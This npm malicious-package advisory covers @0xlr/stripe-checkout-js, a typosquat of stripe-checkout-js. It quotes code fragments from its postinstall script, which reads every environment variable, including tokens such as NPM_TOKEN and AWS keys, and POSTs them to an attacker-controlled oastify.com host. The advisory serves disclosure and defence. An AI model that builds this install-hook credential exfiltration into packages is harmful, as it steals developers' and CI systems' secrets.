npm · Malicious package advisory
Malware@0xlr/stripe-checkout-js
MAL-2026-5388
Malicious code in @0xlr/stripe-checkout-js (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (65b2bf8dcdc0fc9b8fdbf14bbf58a011707a4425cf0029867e28067c08ef5566)
On `npm install`, postinstall.js enumerates the full process.env keyspace plus host identifiers (os.hostname(), username, homedir, cwd, argv, OS details) and POSTs the resulting JSON payload over HTTPS to `rytxau88zxh61dw6qz4yn19naeg54vsk.oastify.com` — a Burp Collaborator out-of-band subdomain used as attacker-controlled exfiltration infrastructure. The relevant code is `Object.keys(process.env).sort().forEach(k => { env[k] = process.env[k]; })` followed by `https.request({hostname: 'rytxau88zxh61dw6qz4yn19naeg54vsk.oastify.com', port: 443,..., method: 'POST'})`. On developer and CI hosts, process.env routinely contains credential-grade values (AWS_*, NPM_TOKEN, GITHUB_TOKEN, CI/CD secrets), all of which are captured and shipped off-host without consent. The package name typosquats the legitimate `stripe-checkout-js`, and the version (999.0.0) is consistent with a placeholder/squat release rather than a real maintained library.
Compromised versions (1)
- 999.0.0
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.